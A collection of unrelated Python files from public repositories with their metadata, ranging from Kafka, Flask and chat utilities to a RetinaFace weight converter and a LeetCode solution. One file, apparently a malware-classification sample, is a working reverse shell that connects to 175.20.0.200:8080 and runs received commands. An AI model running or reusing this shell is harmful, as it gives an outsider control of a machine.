72fdf7852141e481fa5be04b51142c750e6d858c | 0b4e0aced622f59061e93a68dc0556f467b8309f | /utilities/kafka_functions.py | 0951bc8fbb93d0446cbfd08310dd8bf5ed6eb0b3 | [] | no_license | JumaKahiga/cashcog | efbd7b387653745f459aa465d8d14cdca3d90e23 | fbb40a481a3122d30fd41d35da34480c3e943105 | refs/heads/develop | 2022-12-13T01:25:48.520910 | 2020-05-06T11:49:27 | 2020-05-06T11:49:27 | 226,367,108 | 0 | 0 | null | 2022-01-21T20:10:44 | 2019-12-06T16:20:08 | Python | UTF-8 | Python | false | false | 772 | py | from kafka import KafkaProducer
def publish_message(producer_instance, topic_name, key, value):
try:
key_bytes = bytes(key, encoding='utf-8')
value_bytes = bytes(value, encoding='utf-8')
producer_instance.send(topic_name, key=key_bytes, value=value_bytes)
producer_instance.flush()
print('Message published successfully.')
except Exception as ex:
print('Exception in publishing message')
print(str(ex))
def connect_kafka_producer():
_producer = None
try:
_producer = KafkaProducer(
bootstrap_servers=['kafka:9092'], api_version=(0, 10))
except Exception as ex:
print('Exception while connecting Kafka')
print(str(ex))
finally:
return _producer
| [
"kabirumwangi@gmail.com"
] | kabirumwangi@gmail.com |
61a282f16b0983b3c5423e695cafa939076f1269 | dd7d625ba21c63184af482141dd0c530df21d34c | /horus/application/api/client.py | 542d3595bef5e9b4b118a0f59e2611e753e037ef | [] | no_license | juanvaes/horus | 3a333910faaa0e9e66274006689c29ff0e8428a9 | f14be3b408135ffd964d830e6b11c266b6bad286 | refs/heads/master | 2020-03-29T04:36:13.480690 | 2019-02-01T11:42:53 | 2019-02-01T11:42:53 | 149,539,108 | 0 | 0 | null | 2019-01-03T16:43:35 | 2018-09-20T02:22:45 | Python | UTF-8 | Python | false | false | 917 | py | from flask import jsonify, request
from application import session
from urllib.parse import urlparse
from application.api import appi
from application.models import Client
@appi.route('/clients', methods=['GET'])
def get_clients_all():
clients = Client.get_all()
print(clients)
return jsonify({'data':clients})
@appi.route('/client/search', methods=['GET'])
def get_client():
return jsonify({'data':'proving'})
@appi.route('/client/', methods=['POST'])
def post_client():
data = request.json # gets the data as dictionary
client = Client()
client.to_obj(data)
response = Client.create(client)
return jsonify({'message': response})
@appi.route('/client/', methods=['PUT'])
def put_client():
return jsonify({'message':'<h1> Client updated </h1>'})
@appi.route('/client/', methods=['DELETE'])
def delete_client():
return jsonify({'message':'<h1> Client deleted </h1>'})
| [
"juanvaes22@gmail.com"
] | juanvaes22@gmail.com |
2ba29bb6527519b7c9d06927fd4de577934867a1 | 4b8fe7722b590f061435e48a200a5e460c34e09d | /463.py | 4199d0fa3079a6cf9b57fc956709802f611759bd | [] | no_license | luyibo/leetcode | 79902b51092dba3b869c8b9c494c62f387808590 | dfc26b4ed5c7cfc7edad36e75edf6cabfae3bbb4 | refs/heads/master | 2021-05-15T01:11:20.419251 | 2016-12-29T01:56:44 | 2016-12-29T01:57:58 | 57,302,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | class Solution(object):
def islandPerimeter(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
land = 0
neighbour = 0
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == 1:
land += 1
if i<len(grid)-1 and grid[i+1][j] == 1:neighbour += 1
if j<len(grid[0])-1 and grid[i][j+1] == 1:neighbour += 1
return land*4-neighbour*2
s = Solution()
s.islandPerimeter([[0,1,0,0],[1,1,1,0],[0,1,0,0],[1,1,0,0]]) | [
"1428260548@qq.com"
] | 1428260548@qq.com |
174e5543c3d14be2f7973435e139bd2bb9bc19b5 | ef2f932655e4591c4f654431cd96eedd0af2b5ba | /tests/example.py | b717490fbd69d71977bed6f795fb9a7c57e8a744 | [
"MIT"
] | permissive | cair/hex-ai | b380447c6dd445452c161babefdfadf329e899fa | 70c134a1479b58634e62c845314c7536ad64e4be | refs/heads/master | 2021-08-03T02:37:13.928443 | 2021-07-26T19:58:51 | 2021-07-26T20:02:29 | 209,273,454 | 0 | 0 | MIT | 2021-04-19T17:44:02 | 2019-09-18T09:46:06 | C | UTF-8 | Python | false | false | 540 | py | from PyHex import Hex11 as Hex
if __name__ == "__main__":
hg = Hex.HexGame()
winner = -1
for game in range(10000000):
Hex.init(hg)
player = 0
while Hex.full_board(hg) == 0:
position = Hex.place_piece_randomly(hg, player)
if Hex.winner(hg, player, position):
winner = player
break
player = 1 - player
if hg.number_of_open_positions >= 75:
print("\nPlayer %s wins!\n\n" % (winner, ))
Hex.print(hg)
| [
"per@sysx.no"
] | per@sysx.no |
2a5f098970707ee38ff75ca8d29e49d273794e98 | 02fa673f9884afb39cfb3b0a933f31c0490e91ac | /run.py | 54db5923f0f4e7457078279564fb3963d12d1c2e | [] | no_license | morez-tvk/order | d8a1eac6a58150a9ccef244f1adb870cb5011446 | 022d72b3de662720dbbf64b996b149485fa089a8 | refs/heads/master | 2023-04-30T01:05:13.278301 | 2021-05-20T13:11:21 | 2021-05-20T13:11:21 | 289,751,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,620 | py | from flask import Flask, request, jsonify
import requests
from nahayat import NahayatNegar
import flask
import time
from multiprocessing import Process
import json
from LogMg import logger
# import requests
app = Flask(__name__)
app.config["DEBUG"] = True
import datetime
def input_validator(request):
try:
text_json = request.data
json.loads(text_json)
except:
return False
return True
oid = 0
orders = {}
l_o = {}
session = requests.Session()
@app.route('/nahayat_negar', methods=['post'])
def first_order():
global oid
global l_o
global orders
if not input_validator(request):
flask.abort(400, "The input should be json.")
text_json = request.data
data = json.loads(text_json)
if data['status'] == 'set':
oid += 1
# time_period = data.get('tedad', 20)
# delay = data.get('delay', 0)
next_ot = data.get("next_ot")
orders[oid] = NahayatNegar(data=data['json'], limit_time=data['time'],
servers=data['servers'])
# orders[oid].order(next_ot)
t = Process(target=orders[oid].order, args=(next_ot,))
t.start()
print("wating ...")
# orders [oid].multi_req (delay, time_period)
# l_o[oid] = t
return {'id': oid, 'status': 200}
elif data['status'] == 'cancel':
try:
l_o[data['id']].terminate()
l_o[data['id']].join(0)
orders.pop(data['id'])
return {"message": f"order {data['id']} deleted from queue"}
except:
flask.abort(500, "No such order in queue")
@app.route('/get_next', methods=['post'])
def x():
req = request.json
logger.info('sending request')
try:
res = requests.post(req['link'], cookies=req['cookies'], headers=req['headers'], data=req['data'])
ot = res.json()['customer']['orderTicket']
req['data']['data']['orderTicket'] = ot
except KeyError:
logger.error(res.json())
except Exception as e:
logger.error('whattttttttt')
if req['counter'] + 1 < len(req['servers']):
logger.info("sending to next one")
session.post(f"{req['servers'][req['counter']]}:2021/get_next", json={
"link": req['link'],
"cookies": req['cookies'],
"headers": req['headers'],
"data": json.dumps(req['data']),
"servers": req['servers'],
"counter": req['counter'] + 1
})
try:
logger.info(res.json())
except Exception as e:
pass
# app.run(host='0.0.0.0',port=2020)
| [
"tavakolian.mr@gmail.com"
] | tavakolian.mr@gmail.com |
66eef6585fd94f0ceff511a5bcdfafdbbc1d0330 | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad382.py | 9b733b70a15ec41b80a16eccdf59369f39e4f4a9 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | import bz2
import threading
import socket
import subprocess
import lzma
import hashlib
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
05b6136d14b4fcea82c6f71e820305b667687133 | 48d6041a7744baa1a4c563380d00fed8ae66cb08 | /flo.py | 36c0373df517bd9d0e598b1336d24e74eb454906 | [] | no_license | gowtham-kingxo/Ubuntu_Installation_form | 34c7e35aa49a5165bf25d3d555742e3f9018bf4b | fcff2287bc8bdc4295e069367d6d68f60db17d71 | refs/heads/master | 2021-01-11T13:36:59.208082 | 2017-06-23T17:16:00 | 2017-06-23T17:16:00 | 95,014,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38 | py | x=input()
y=input()
print(x)
print(y) | [
"gowtham.gourov@gmail.com"
] | gowtham.gourov@gmail.com |
75b9354c43fbe2ada91b3db0a439507494e90df6 | 26e33f6491218e2a1c677e917742e42bfcd0eaa6 | /pychat/pychat/Assigner.py | 0c0de1a7f530f30c7eff31c170e55a5bfe4abd14 | [
"MIT"
] | permissive | fanjiamin1/cryptocurrencies | 4ef1f37b56dc3d098f3a47cbd198952da74ec635 | 2009ade60f74093ff9946b99ae45d2964f5a75ca | refs/heads/master | 2021-01-21T11:49:06.636178 | 2016-12-20T13:29:06 | 2016-12-20T13:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,394 | py | import socket
import sys
from pychat.crypto import AES as Cipher
from Crypto import Random
class Alice():
def __init__(self, key="0123456789defabc"):
self.key = key
self.cipher = Cipher(self.key)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connect(self, ip_address, port):
self.socket.connect((ip_address, port))
def send(self, message):
self.socket.sendall(self.cipher.encrypt(message))
def assign(self,difficulty=10, prefix='thisiseasymonkey'):
print('in assign')
self.send(prefix+' '+str(difficulty))
#felt like this would do more...
if __name__ == "__main__":
args = sys.argv[1:]
try:
bob_ip = input("IP address: ")
bob_port = int(input("Port: "))
key = input("Encryption key: ")
except KeyboardInterrupt:
print()
print("No chatting with Bob today... </3")
sys.exit()
print("Attempting to connect to {} on port {}".format(bob_ip, bob_port))
alice = Alice() # key variable unused
try:
alice.connect(bob_ip, bob_port)
except:
print("Couldn't get a connection with Bob...")
sys.exit()
try:
while 1:
print("to send a proof of work task"
+"simply write 'task', you can also specify"
+"a 16 byte prefix and a number of zeroes"
+"to be found in a sha5 hash with that prefix"
+"by writing task(prefix,numzeroes)")
print("you can also send simple encrypted messages")
message=input("Message: ")
print(message)
print(message.lower())
print(message.lower()=='task')
istask=False
if message.lower()=='task':
istask=True
alice.assign()
elif message.lower()[:5]=="task(":
istask=True
prefix=message[5:21]
try:
difficulty=int(message[22:])
except ValueError:
istask=False
if istask:
alice.assign(prefix,difficulty)
if not istask:
alice.send(message)
except KeyboardInterrupt:
print()
print("That's enough chatting for now")
| [
"ivarr15@ru.is"
] | ivarr15@ru.is |
b10302ab2daca47e9bd8afe17228e2f901d2976a | d00b1e01f82076248eb07d6391fafabfbac74898 | /metadata/FrostNumber/hooks/pre-stage.py | 7f090d9c2b69e9473bb79627b7d4db1dbab856b5 | [
"MIT"
] | permissive | csdms/wmt-metadata | 9b922415faa397e3d5511f258e1a4fda846b78b7 | 39207acc376f1cd21b2ae1d5581a1e2c317a6441 | refs/heads/master | 2020-04-07T00:39:56.268862 | 2019-02-26T21:24:20 | 2019-02-26T21:24:20 | 51,040,972 | 0 | 0 | MIT | 2018-10-31T19:36:54 | 2016-02-04T00:23:47 | Python | UTF-8 | Python | false | false | 769 | py | """A hook for modifying parameter values read from the WMT client."""
import os
import shutil
from wmt.utils.hook import find_simulation_input_file, yaml_dump
from topoflow_utils.hook import assign_parameters
file_list = []
def execute(env):
"""Perform pre-stage tasks for running a component.
Parameters
----------
env : dict
A dict of component parameter values from WMT.
"""
env['end_year'] = long(env['start_year']) + long(env['_run_duration']) - 1
env['fn_out_filename'] = 'frostnumber_output.dat'
assign_parameters(env, file_list)
for fname in file_list:
src = find_simulation_input_file(env[fname])
shutil.copy(src, os.curdir)
env['_file_list'] = file_list
yaml_dump('_env.yaml', env)
| [
"mark.piper@colorado.edu"
] | mark.piper@colorado.edu |
a296c689355de9ff44465c89010087d206693bda | e15d63ccde04e7458bff5af1bdad63a5c699b489 | /example/Model_Conversion/mx2torch/retinaface_r50/res50_transfer_weight.py | 17e4e530621f5d1100de117f9e520503564c3aba | [
"WTFPL"
] | permissive | ddddwee1/TorchSUL | 775b6a2b1e4ab7aac25a3f0411de83affc257af5 | 6c7cd41b14fc8b746983e8b981d1ba4d08370ca2 | refs/heads/master | 2023-08-21T15:21:24.131718 | 2023-08-18T09:37:56 | 2023-08-18T09:37:56 | 227,628,298 | 13 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,870 | py | import numpy as np
from TorchSUL import Model as M
import torch
import torch.nn as nn
import torch.nn.functional as F
class Unit(M.Model):
def initialize(self, chn, stride=1, shortcut=False):
self.bn0 = M.BatchNorm()
self.act = M.Activation(M.PARAM_RELU)
self.c1 = M.ConvLayer(1, chn, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.c2 = M.ConvLayer(3, chn, stride=stride, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.c3 = M.ConvLayer(1, chn*4, usebias=False)
self.shortcut = shortcut
if shortcut:
self.sc = M.ConvLayer(1, chn*4, stride=stride, usebias=False)
def forward(self, inp):
if self.shortcut:
inp = self.bn0(inp)
inp = self.act(inp)
x2 = x = self.c1(inp)
x = self.c2(x)
x = self.c3(x)
sc = self.sc(inp)
x = sc + x
else:
x = self.bn0(inp)
x = self.act(x)
x2 = x = self.c1(x)
x = self.c2(x)
x = self.c3(x)
x = inp + x
return x, x2
class Stage(M.Model):
def initialize(self, outchn, num_units, stride):
self.units = nn.ModuleList()
for i in range(num_units):
self.units.append(Unit(outchn, stride=stride if i==0 else 1, shortcut = i==0))
def forward(self, x):
for i,u in enumerate(self.units):
if i==0:
x, x2 = u(x)
else:
x, _ = u(x)
return x, x2
class DETHead(M.Model):
def initialize(self):
self.c11 = M.ConvLayer(3, 256, batch_norm=True)
self.c21 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
self.c22 = M.ConvLayer(3, 128, batch_norm=True)
self.c31 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
self.c32 = M.ConvLayer(3, 128, batch_norm=True)
self.act = M.Activation(M.PARAM_RELU)
def forward(self, x):
x1 = self.c11(x)
x2 = self.c21(x)
x3 = self.c31(x2)
x3 = self.c32(x3)
x2 = self.c22(x2)
x = torch.cat([x1, x2, x3], dim=1)
x = self.act(x)
return x
class RegressHead(M.Model):
def initialize(self):
self.c1 = M.ConvLayer(1,4)
self.c2 = M.ConvLayer(1,8)
self.c3 = M.ConvLayer(1,20)
def forward(self, x):
prob = self.c1(x)
bbox = self.c2(x)
kpts = self.c3(x)
prob = prob.view(prob.shape[0],2,prob.shape[2]*2,prob.shape[3])
prob = F.softmax(prob, dim=1)
prob = prob.view(prob.shape[0],4,-1, prob.shape[3])
return prob, bbox, kpts
class Detector(M.Model):
def initialize(self):
self.bn0 = M.BatchNorm()
self.c1 = M.ConvLayer(7, 64, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.pool = M.MaxPool2D(3, 2)
self.stage1 = Stage(64, num_units=3, stride=1)
self.stage2 = Stage(128, num_units=4, stride=2)
self.stage3 = Stage(256, num_units=6, stride=2)
self.stage4 = Stage(512, num_units=3, stride=2)
self.bn1 = M.BatchNorm()
self.act = M.Activation(M.PARAM_RELU)
self.ssh_c3_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det3 = DETHead()
self.head32 = RegressHead()
self.ssh_c2_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.ssh_c3_upsampling = M.NNUpSample(2)
self.ssh_c2_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det2 = DETHead()
self.head16 = RegressHead()
self.ssh_m1_red_conv = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.ssh_c2_upsampling = M.NNUpSample(2)
self.ssh_c1_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det1 = DETHead()
self.head8 = RegressHead()
def forward(self, x):
x = self.bn0(x)
x = self.c1(x)
x = self.pool(x)
x, _ = self.stage1(x)
x, _ = self.stage2(x)
x, f1 = self.stage3(x)
x, f2 = self.stage4(x)
x = self.bn1(x)
x = self.act(x)
fc3 = x = self.ssh_c3_lateral(x)
d3 = x = self.det3(x)
scr32, box32, lmk32 = self.head32(d3)
fc2 = self.ssh_c2_lateral(f2)
x = self.ssh_c3_upsampling(fc3)
x = x[:,:,:fc2.shape[2],:fc2.shape[3]]
plus100 = x = fc2 + x
fc2_aggr = x = self.ssh_c2_aggr(x)
d2 = x = self.det2(x)
scr16, box16, lmk16 = self.head16(d2)
fc1 = self.ssh_m1_red_conv(f1)
x = self.ssh_c2_upsampling(fc2_aggr)
x = x[:,:,:fc1.shape[2],:fc1.shape[3]]
x = fc1 + x
fc1_aggr = x = self.ssh_c1_aggr(x)
d1 = x = self.det1(x)
scr8, box8, lmk8 = self.head8(d1)
results = [scr32, box32, lmk32, scr16, box16, lmk16, scr8, box8, lmk8]
return results
if __name__=='__main__':
net = Detector()
net.eval()
x = torch.from_numpy(np.ones([1,3,640,640]).astype(np.float32))
_ = net(x)
# net.bn_eps(1e-5)
# net.backbone.det1.bn_eps(2e-5)
res = {}
ps = net.named_parameters()
for p in ps:
name, p = p
res[name] = p
ps = net.named_buffers()
for p in ps:
name, p = p
res[name] = p
def get_bn(l1, l2):
a = []
b = []
a.append(l1+'.weight')
a.append(l1+'.bias')
a.append(l1+'.running_mean')
a.append(l1+'.running_var')
b.append(l2+'_gamma')
b.append(l2+'_beta')
b.append(l2+'_moving_mean')
b.append(l2+'_moving_var')
return a, b
def get_conv(l1, l2, bias=False):
a = [l1 + '.weight']
b = [l2 + '_weight']
if bias:
a.append(l1+'.bias')
b.append(l2+'_bias')
return a,b
def get_layer(l1, l2, bias=False):
res = []
res.append(get_conv(l1 + '.conv', l2%('conv')))
res.append(get_bn(l1 + '.bn', l2%('batchnorm')))
return res
def get_convbn(l1, l2, bias=False):
res = []
res.append(get_conv(l1 + '.conv', l2, bias=bias))
res.append(get_bn(l1 + '.bn', l2 + '_bn'))
return res
def get_unit(l1, l2, sc=False):
res = []
res.append(get_bn(l1+'.bn0', l2+'_bn1'))
res.append(get_conv(l1+'.c1.conv', l2+'_conv1'))
res.append(get_bn(l1+'.c1.bn', l2+'_bn2'))
res.append(get_conv(l1+'.c2.conv', l2+'_conv2'))
res.append(get_bn(l1+'.c2.bn', l2+'_bn3'))
res.append(get_conv(l1+'.c3.conv', l2+'_conv3'))
if sc:
res.append(get_conv(l1+'.sc.conv', l2+'_sc'))
return res
def get_stage(l1, l2, blocknum):
res = []
for i in range(blocknum):
res += get_unit(l1+'.units.%d'%i, l2+'_unit%d'%(i+1), sc= i==0)
return res
def get_dethead(l1, l2):
res = []
res += get_convbn(l1+'.c11', l2+'_conv1', bias=True)
res += get_convbn(l1+'.c21', l2+'_context_conv1', bias=True)
res += get_convbn(l1+'.c22', l2+'_context_conv2', bias=True)
res += get_convbn(l1+'.c31', l2+'_context_conv3_1', bias=True)
res += get_convbn(l1+'.c32', l2+'_context_conv3_2', bias=True)
return res
def get_regress(l1, l2):
res = []
res.append(get_conv(l1+'.c1.conv', l2%('cls_score'), bias=True))
res.append(get_conv(l1+'.c2.conv', l2%('bbox_pred'), bias=True))
res.append(get_conv(l1+'.c3.conv', l2%('landmark_pred'), bias=True))
return res
def totonoi(l):
# print(l)
a = []
b = []
for i in l:
a += i[0]
b += i[1]
return a,b
l = []
l.append(get_bn('bn0', 'bn_data'))
l.append(get_conv('c1.conv', 'conv0'))
l.append(get_bn('c1.bn', 'bn0'))
l += get_stage('stage1', 'stage1', 3)
l += get_stage('stage2', 'stage2', 4)
l += get_stage('stage3', 'stage3', 6)
l += get_stage('stage4', 'stage4', 3)
l.append(get_bn('bn1', 'bn1'))
l += get_convbn('ssh_c3_lateral', 'ssh_c3_lateral', bias=True)
l += get_dethead('det3', 'ssh_m3_det')
l += get_regress('head32', 'face_rpn_%s_stride32')
l += get_convbn('ssh_c2_lateral', 'ssh_c2_lateral', bias=True)
l += get_convbn('ssh_c2_aggr', 'ssh_c2_aggr', bias=True)
l += get_dethead('det2', 'ssh_m2_det')
l += get_regress('head16', 'face_rpn_%s_stride16')
l += get_convbn('ssh_m1_red_conv', 'ssh_m1_red_conv', bias=True)
l += get_convbn('ssh_c1_aggr', 'ssh_c1_aggr', bias=True)
l += get_dethead('det1', 'ssh_m1_det')
l += get_regress('head8', 'face_rpn_%s_stride8')
a,b = totonoi(l)
# print(a,b)
import source
for i,j in zip(a,b):
# print(i,j)
value = source.res[j].asnumpy()
# print(value.shape)
# print(res[i].shape)
res[i].data[:] = torch.from_numpy(value)[:]
# net.bn_eps(2e-5)
y = net(x)
print(y[0])
print(y[0].shape)
M.Saver(net).save('./model_r50/r50_retina.pth')
| [
"cy960823@outlook.com"
] | cy960823@outlook.com |
d5e603260c7090d7a8d90aa950916b167e7fe620 | 3f1bc9c7d58f89fcc61b44e1e8197a5df18e3dbc | /src/light_demo.py | 439753943ad251e822817883a28e8ddb6e3a3161 | [] | no_license | kynamg/hello | 4a382f2eb2fbf8847cb5df13fab4a8b90fcf9868 | 92b8059fb5f05b20abfcccc54dc4e47d3d9b6ef2 | refs/heads/master | 2021-08-22T23:03:21.314150 | 2017-12-01T15:16:41 | 2017-12-01T15:16:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,912 | py | #!/usr/bin/env python
# Title : light_demo.py
# Author : Kyna Mowat-Gosnell
# Date : 09/10/17
# Version : 2.0
import rospy, qi, argparse
import sys
import time
import naoqi
from naoqi import *
from diagnostic_msgs.msg import KeyValue # message type /iot_updates uses
from std_msgs.msg import Empty
def callback(data):
print("inside callback")
def iot_callback(data):
if(data.key == " Hue_iris_toggle_2" and data.value == "ON"): # Button pressed
intcm_ring()
def intcm_ring():
ttsProxy.say("Turning on the light")
#animatedProxy.say("There is someone at the door")
#tabletProxy.showWebview("http://192.168.1.121/apps/webview-6b6450/index.html")
#tabletProxy.showWebview("http://192.168.1.99/mjpg/video.mjpg")
tabletProxy.showWebview("https://www.thdstatic.com/spin/59/205316159/205316159_S01.spin?thumb&profile=400")
time.sleep(5)
tabletProxy.hideWebview()
def listener():
rospy.init_node('listener', anonymous=True) # initialise node to subscribe to topic
rospy.Subscriber("/iot_command", KeyValue, iot_callback)
rospy.spin() # keeps python from exiting until node is stopped
if __name__ == '__main__':
from naoqi import ALProxy
# Create a local broker, connected to the remote naoqi
broker = ALBroker("pythonBroker", "192.168.1.129", 9999, "pepper.local", 9559)
#animatedProxy = ALProxy("ALAnimatedSpeech", "pepper.local", 9559) # initialise animated speech proxy
ttsProxy = ALProxy("ALTextToSpeech", "pepper.local", 9559)
tabletProxy = ALProxy("ALTabletService", "pepper.local", 9559)
tabletProxy.getWifiStatus() # check wifi status
print tabletProxy.getWifiStatus() # print wifi status "CONNECTED" if connected
postureProxy = ALProxy("ALRobotPosture", "pepper.local", 9559) # initialise posture proxy
postureProxy.goToPosture("StandInit", 0.5) # return to initial position
while True:
listener()
| [
"hwlivinglab@gmail.com"
] | hwlivinglab@gmail.com |
46bd95d09f6bc8aecede6db2b326fc90533f3af9 | 45467e07e77131f631d0865046dcc4d18f483601 | /src/Hackerearth/round_2/A.py | a766bae20c7b6478ffb22d212ff53cd5256fddb7 | [] | no_license | bvsbrk/Algos | 98374e094bd3811579276d25a82bbf2c0f046d96 | cbb18bce92054d57c0e825069ef7f2120a9cc622 | refs/heads/master | 2021-09-25T10:01:59.323857 | 2018-10-20T16:07:07 | 2018-10-20T16:07:07 | 98,708,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | if __name__ == '__main__':
for _ in range(int(input().strip())):
n = int(input().strip())
x = n
arr = [int(i) for i in input().strip().split()]
arr = arr[::-1]
i = 0
while arr[i] == 0 and i < n:
i += 1
x -= 1
if i == n - 1:
print(0)
else:
ans = []
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
# neg sgn
if n % 2 == 0:
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
else:
if arr[i] < 0:
ans.append(1)
else:
ans.append(-1)
print(*ans)
| [
"v.ramakoteswararao2015@vit.ac.in"
] | v.ramakoteswararao2015@vit.ac.in |
42c458f3d032a3537cacc143e6752b2e931af068 | a2783f4380503c68db31506243f7c3021c9752f9 | /consulta_estados_brasileiros.py | 0dff039ac70b463a576fce01d1344f2c4f05f1c0 | [] | no_license | jpablolima/python | 2f541378ed3b9fb582c9b1fe8a14ec80891241be | 8e67d723e9649c557786583b257bbde9b899ea37 | refs/heads/master | 2020-06-24T17:51:23.908809 | 2019-11-21T13:41:09 | 2019-11-21T13:41:09 | 199,036,691 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | import sqlite3
conexao = sqlite3.connect("brasil.db")
conexao.row_factory = sqlite3.Row
print("%3s %-20s %12s" % ("Id", "Estado", "População"))
print("="*37)
for estado in conexao.execute("select * from estados order by nome"):
print("%3d %-20s %12d" %
(estado["id"],
estado["nome"],
estado["populacao"]))
conexao.close | [
"jp.pablolima@gmail.com"
] | jp.pablolima@gmail.com |
a76f90ee511fdec16e0583ce58592537635c4b8f | 9bbe37776a81954085d21b1b80248ca05094a8ff | /day08/day0801/demo02_v2.py | 7ca9113815f3d292b54a150907dc54a298bf092b | [] | no_license | wxsel/myseleniumproject | e8fd68384055aa696b76e69c49ac6a1df8c0e05f | 98d1c50d9ab133aa1e0801ec2825f986902602d8 | refs/heads/master | 2020-08-08T00:53:45.200465 | 2019-10-08T13:28:06 | 2019-10-08T13:28:06 | 213,648,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,527 | py | #!/usr/bin/env python3
# coding=utf-8
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.select import Select
from time import sleep
driver=webdriver.Chrome()
# 打开浏览器
def open(url):
base_url=url
driver.get(base_url)
base_url=""
# 操作页面元素mycase1
def mycase1():
name=driver.find_element(By.XPATH,"//input[@name='username']")
name.send_keys("张晓明")
password = driver.find_element(By.XPATH, "//input[@name='password']")
password.send_keys("123456")
male = driver.find_element(By.XPATH, "//input[@name='sex']")
male.click()
email = driver.find_element(By.XPATH, "//input[@name='email']")
email.send_keys('xiaoming@126.com')
profession = driver.find_element(By.XPATH, "//select[@name='profession']")
p1 = Select(profession)
p1.select_by_visible_text("法律相关")
film = driver.find_element(By.XPATH, "//input[@name='film']")
if film.is_selected() == False:
film.click()
painting = driver.find_element(By.XPATH, "//input[@name='painting']")
if painting.is_selected() == False:
painting.click()
comments = driver.find_element(By.XPATH, "//textarea")
comments.send_keys("软件测试工程师")
sleep(1)
submit = driver.find_element(By.XPATH, "//input[@name='submit']")
submit.click()
# 关闭浏览器
def bye_bye():
driver.quit()
if __name__ == '__main__':
# 打开页面
my_url=""
open(my_url)
mycase1()
bye_bye() | [
"hoou1993"
] | hoou1993 |
6ce151591e20779df71ce25110bc3831ce51c59a | b792f600ed4e50f34e65e4f334cf7a32d319cc0e | /2017/day11.py | cf2d1b7780f769b1e96bacb18b46b9ecb825122d | [] | no_license | daniel70/AoC | d577f490559d4a0f0d24567bd796117e1aac94ec | ef704a4f6e90168cdc2a91e894583a96e9a6c371 | refs/heads/master | 2022-12-28T03:19:08.341913 | 2022-12-16T01:52:39 | 2022-12-18T01:30:50 | 224,876,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | directions = {
'n': (0, 1),
'ne': (1, 0.5),
'se': (1, -0.5),
's': (0, -1),
'sw': (-1, -0.5),
'nw': (-1, 0.5),
}
def distance(instructions: list[str]) -> tuple[int, int]:
origin = [0, 0]
furthest = 0
for direction in instructions:
dx, dy = directions[direction]
origin[0] += dx
origin[1] += dy
x, y = origin
furthest = max(furthest, abs(x) + max(int(abs(y)) - abs(x) // 2, 0))
steps = abs(x) + max(int(abs(y)) - abs(x) // 2, 0)
return steps, furthest
instructions = open("input11.txt").read().strip().split(",")
answer1, answer2 = distance(instructions=instructions)
print("answer 1:", answer1)
print("answer 2:", answer2)
| [
"vdmeulen.daniel@gmail.com"
] | vdmeulen.daniel@gmail.com |
63189884e723d6a31b370e37804c9082c206e005 | 023a5279d1c6f02f4a6952b2538d7bc046d02fc9 | /staffs/admin.py | 7748da2f180d330938614c580a230641754ca2b4 | [] | no_license | mandal143/staff | af24767e9126e5af6aa0c1d36a62f37d93b281be | 6f52ece9ea5eacf24289bea11773d36ec8b69906 | refs/heads/master | 2023-08-10T16:07:10.775517 | 2020-07-03T14:02:10 | 2020-07-03T14:02:10 | 276,841,994 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | from django.contrib import admin
from .models import Employees, LoginLogoutLog
admin.site.register(Employees)
admin.site.register(LoginLogoutLog) | [
"49410374+mandal143@users.noreply.github.com"
] | 49410374+mandal143@users.noreply.github.com |
7441c8779392e406177ecd3e8cb518398c54c8f9 | 14eea746af39f11e6a63306b4f6f0201cf8c2a4d | /adventofcode/day7.py | 0d3a8ebce21725bbb4a53c9066f8654e9ded4d0f | [] | no_license | andrehsu/Advent-of-Code-2019-Python | ce6985ff4f5b329dda5bc6f148dc42ae51160c78 | 5363d4eb9e6c7baf6f8c2a47807fc7e1449fce7f | refs/heads/master | 2022-07-05T05:05:06.476339 | 2020-09-18T08:30:24 | 2020-09-18T08:30:24 | 226,030,389 | 0 | 0 | null | 2022-06-22T03:38:16 | 2019-12-05T06:18:09 | Python | UTF-8 | Python | false | false | 3,965 | py | from itertools import permutations
from typing import Optional, Tuple
from utils import read_input
